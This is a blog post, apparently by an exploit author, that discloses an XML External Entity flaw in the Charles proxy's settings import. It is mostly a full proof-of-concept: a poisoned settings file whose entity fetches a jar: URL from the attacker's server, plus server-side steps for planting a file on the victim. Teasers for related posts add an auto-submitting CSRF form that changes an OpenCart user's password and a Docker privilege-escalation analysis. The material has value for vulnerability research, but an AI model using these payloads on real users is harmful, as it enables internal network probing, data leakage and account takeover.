Charles 4.2.7 XML External Entity

Software Link:https://www.charlesproxy.com
Date:11.12.2018
Exploit Author:CK01
Version:<=4.2.7

 
Security Issue:


The XML External Entity vulnerability exists in the Charles import/export setup option. If the user imports the "Charles Settings.xml" of the attacker, the internal network may be detected and the information may be leaked.




POC:






1.Charles Setting.xml:(127.0.0.1 -> attacker's server )




<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<charles-export>
  <proxyConfiguration>
    <enableSOCKSProxy>false</enableSOCKSProxy>
    <dynamicHTTPPort>false</dynamicHTTPPort>
    <dynamicSOCKSPort>false</dynamicSOCKSPort>
    <enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying>
    <port>8888</port>
    <SOCKSPort>8889</SOCKSPort>
    <decryptSSL>true</decryptSSL>
    <transparentProxy>false</transparentProxy>
    <preferIPv6addresses>false</preferIPv6addresses>
    <sslLocations>
      <locationPatterns>
        <locationMatch>
          <location>
            <host>*</host>
            <port>443</port>
          </location>
          <enabled>true</enabled>
        </locationMatch>
      </locationPatterns>
    </sslLocations>
    <defaultSOCKSTransparentHTTPProxyPorts>true</defaultSOCKSTransparentHTTPProxyPorts>
    <socksTransparentHTTPProxyPorts/>
    <socksTransparentHTTPProxyPortRanges/>
    <windowsConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>true</enableAtStartup>
    </windowsConfiguration>
    <macOSXConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>false</enableAtStartup>
    </macOSXConfiguration>
    <mozillaFirefoxConfiguration>
      <useHTTP>true</useHTTP>
      <useSOCKS>false</useSOCKS>
      <enableAtStartup>true</enableAtStartup>
    </mozillaFirefoxConfiguration>
  </proxyConfiguration>
  <recordingConfiguration>
    <limit>100</limit>
    <maxTransactions>0</maxTransactions>
    <maxWebSocketMessages>-1</maxWebSocketMessages>
    <ignoreHosts>
      <locationPatterns/>
    </ignoreHosts>
    <recordHosts>
      <locationPatterns/>
    </recordHosts>
  </recordingConfiguration>
  <accessControlConfiguration>
    <warn>true</warn>
    <ipRanges>
      <ipRange>
        <ip>
          <int>192</int>
          <int>168</int>
          <int>2</int>
          <int>43</int>
        </ip>
        <mask>
          <int>255</int>
          <int>255</int>
          <int>255</int>
          <int>255</int>
        </mask>
      </ipRange>
    </ipRanges>
  </accessControlConfiguration>
  <externalProxyConfiguration>
    <configurations>
      <entry>
        <string>socks</string>
        <mutableExternalProxyConfiguration>
          <active>false</active>
          <requiresAuthentication>false</requiresAuthentication>
          <port>0</port>
        </mutableExternalProxyConfiguration>
      </entry>
      <entry>
        <string>http</string>
        <mutableExternalProxyConfiguration>
          <active>true</active>
          <requiresAuthentication>false</requiresAuthentication>
          <host>127.0.0.1</host>
          <port>1087</port>
          <domain></domain>
          <username></username>
          <encryptedPassword>2aQ4yHV+W99fhLcoM+aSlQ==</encryptedPassword>
        </mutableExternalProxyConfiguration>
      </entry>
      <entry>
        <string>https</string>
        <mutableExternalProxyConfiguration>
          <active>true</active>
          <requiresAuthentication>false</requiresAuthentication>
          <host>127.0.0.1</host>
          <port>1087</port>
          <domain></domain>
          <username></username>
          <encryptedPassword>X7aDnIieHyR9nVYpOPBpBw==</encryptedPassword>
        </mutableExternalProxyConfiguration>
      </entry>
    </configurations>
    <enabled>true</enabled>
    <alwaysBypassLocalhost>true</alwaysBypassLocalhost>
  </externalProxyConfiguration>
  <throttlingConfiguration>
    <bandwidthDown>57.6</bandwidthDown>
    <bandwidthUp>33.6</bandwidthUp>
    <utilisationDown>70</utilisationDown>
    <utilisationUp>70</utilisationUp>
    <latency>250</latency>
    <reliability>100</reliability>
    <mtu>576</mtu>
    <lowQuality>100</lowQuality>
    <highQuality>100</highQuality>
    <stability>100</stability>
    <customPresets/>
    <hosts class="listAdapter">
      <list/>
    </hosts>
    <selectedHosts>false</selectedHosts>
  </throttlingConfiguration>
  <startupConfiguration>
    <newSession>true</newSession>
    <throttling>false</throttling>
    <checkUpdates>true</checkUpdates>
    <maximised>false</maximised>
    <fullscreen>false</fullscreen>
    <mainWindow>
      <x>171</x>
      <y>64</y>
      <width>1231</width>
      <height>770</height>
    </mainWindow>
    <currentDirectory>&file;</currentDirectory>
    <lastCheckUpdates>2018-11-12 07:40:37.437 UTC</lastCheckUpdates>
  </startupConfiguration>
  <userInterfaceConfiguration>
    <promptToSaveSessions>false</promptToSaveSessions>
    <promptToClearSession>false</promptToClearSession>
    <showLineNumbers>true</showLineNumbers>
    <lineWrap>true</lineWrap>
    <autoScroll>true</autoScroll>
    <combineHeadersAndBody>true</combineHeadersAndBody>
    <combineRequestAndResponse>true</combineRequestAndResponse>
    <minimiseToTray>false</minimiseToTray>
    <showMemoryUsage>false</showMemoryUsage>
    <enableHotkeys>true</enableHotkeys>
    <alwaysOnTop>false</alwaysOnTop>
    <showTrayIcon>true</showTrayIcon>
    <highlightTreeChanges>true</highlightTreeChanges>
    <sequenceFocused>false</sequenceFocused>
    <sessionNavStructureLayout>0</sessionNavStructureLayout>
    <sessionNavSequenceLayout>1</sessionNavSequenceLayout>
    <unitsSpeed>0</unitsSpeed>
    <unitsTime>0</unitsTime>
    <warningsSeen/>
    <properties>
      <entry>
        <string>SessionFrame.splitPlane.dividerLocation.horizontal</string>
        <int>300</int>
      </entry>
      <entry>
        <string>RequestResponsePanel.DIVIDER_LOCATON</string>
        <int>289</int>
      </entry>
      <entry>
        <string>SummaryPanel.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.SIZE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.TIMELINE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.DURATION_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>SessionFrame.splitPlane.dividerLocation.vertical</string>
        <int>200</int>
      </entry>
      <entry>
        <string>SessionFrame.navTabs.mode</string>
        <string>Structure</string>
      </entry>
      <entry>
        <string>URLEncodedQueryViewer.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>NavigatorJTable.TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
      <entry>
        <string>ChartPanel.TYPE_TABLE_COLUMN_STATES</string>
        <columnStates/>
      </entry>
    </properties>
  </userInterfaceConfiguration>
  <toolConfiguration>
    <configs>
      <entry>
        <string>Breakpoints</string>
        <breakpoints>
          <toolEnabled>false</toolEnabled>
          <breakpoints/>
        </breakpoints>
      </entry>
      <entry>
        <string>Reverse Proxies</string>
        <reverseProxies>
          <active>false</active>
          <reverseProxies/>
        </reverseProxies>
      </entry>
      <entry>
        <string>White List</string>
        <whitelist>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
          <action>0</action>
        </whitelist>
      </entry>
      <entry>
        <string>Map Remote</string>
        <map>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </map>
      </entry>
      <entry>
        <string>Port Forwarding</string>
        <portForwarding>
          <active>false</active>
          <portForwardings/>
        </portForwarding>
      </entry>
      <entry>
        <string>Viewer Mappings</string>
        <viewerMappings>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </viewerMappings>
      </entry>
      <entry>
        <string>Rewrite</string>
        <rewrite>
          <toolEnabled>false</toolEnabled>
          <debugging>false</debugging>
          <sets/>
        </rewrite>
      </entry>
      <entry>
        <string>Map Local</string>
        <mapLocal>
          <toolEnabled>false</toolEnabled>
          <mappings/>
        </mapLocal>
      </entry>
      <entry>
        <string>Black List</string>
        <blacklist>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
          <action>0</action>
        </blacklist>
      </entry>
      <entry>
        <string>Client Process</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
      <entry>
        <string>No Caching</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
      <entry>
        <string>DNS Spoofing</string>
        <dnsSpoofing>
          <toolEnabled>false</toolEnabled>
          <spoofs/>
        </dnsSpoofing>
      </entry>
      <entry>
        <string>Mirror</string>
        <mirror>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </mirror>
      </entry>
      <entry>
        <string>Auto Save</string>
        <autoSave>
          <toolEnabled>false</toolEnabled>
          <enableOnStartup>false</enableOnStartup>
          <saveLowMem>false</saveLowMem>
          <startOnMultiple>false</startOnMultiple>
          <savePeriod>0</savePeriod>
        </autoSave>
      </entry>
      <entry>
        <string>Block Cookies</string>
        <selectedHostsTool>
          <locations>
            <locationPatterns/>
          </locations>
          <toolEnabled>false</toolEnabled>
          <useSelectedLocations>false</useSelectedLocations>
        </selectedHostsTool>
      </entry>
    </configs>
  </toolConfiguration>
  <remoteControlConfiguration>
    <enabled>false</enabled>
    <allowAnonymous>false</allowAnonymous>
    <users/>
  </remoteControlConfiguration>
  <clientSSLCertificatesConfiguration>
    <certificates/>
  </clientSSLCertificatesConfiguration>
  <protobufConfiguration>
    <hideUnvaluedFields>true</hideUnvaluedFields>
    <cacheDescriptors>true</cacheDescriptors>
    <heuristicTTL>300000</heuristicTTL>
    <descriptors/>
  </protobufConfiguration>
  <gistConfiguration>
    <publishLimit>10</publishLimit>
    <secret>true</secret>
    <openGist>true</openGist>
    <enterpriseGitHub>false</enterpriseGitHub>
  </gistConfiguration>
  <focusConfiguration>
    <hosts>
      <locationPatterns/>
    </hosts>
  </focusConfiguration>
</charles-export>




2.The attacker executes on the server: java BlockingServer 2014 xxe.txt






3.xxe.txt on the attacker's server




  This file comes from the attacker server!






4.The victim temporary directory will generate the jar_cachexxxxxxxxxxxxx.tmp file with the content: "This file comes from the attacker server!"










reference:


http://www.pwntester.com/blog/2013/11/28/abusing-jar-downloads/


https://github.com/pwntester/BlockingServer


https://www.youtube.com/watch?v=eHSNT8vWLfc&feature=youtu.be


































评论











发表评论























此博客中的热门博文









Docker's latest version of privilege escalation vulnerability 




















图片







0x00 Vulnerability analysis   1.com.docker.vmnetd is a launch service that runs at root authority; communicates with the client (Docker) through a local socket; after analysis, it is found that the client is not verified during the communication process, resulting in the risk of elevated permissions   2. The two main functions in main_handle are vmnet_handshake_Perform and vmnetd_commands_Handle; vmnet_handshake_Perform function mainly initializes the message and obtains the corresponding client command. vmnetd_commands_Handle function calls the corresponding callback function according to the obtained command    2.1 vmnet_handshake_Perform  2.1.1 First obtain the initialization message (3 packets) requested by the client through vmnet_handshake_readInitMessage. The message structure is as follows   packet-1: flag  c00009a318  56 4d 4e 33 54 00 00 00 00 00 00 00 00 00 00 00  VMN3T...........  c00009a328  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...








阅读全文










Opencart-v3-0-3-0 user changes password at csrf vulnerability




















图片







Software Link: https://github.com/opencart/opencart/  Date: 06.28.2018  Exploit Author:CK01  Version:<= V3-0-3-0   0x00 Vulnerability analysis         The user token was not verified at the password change, causing the csrf vulnerability to modify the user password    /upload/catalog/controller/account/password.php     0x01 Exploit   Save the following exp as html and open the run   <html>      <body>       <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">      <input type="hidden" name="password" value="CK01ck01" />        <input type="hidden" name="confirm" value="CK01ck01" />   <script>           document.getElementById('post123').submit();    </script>       </form>     </body>   </html>...








阅读全文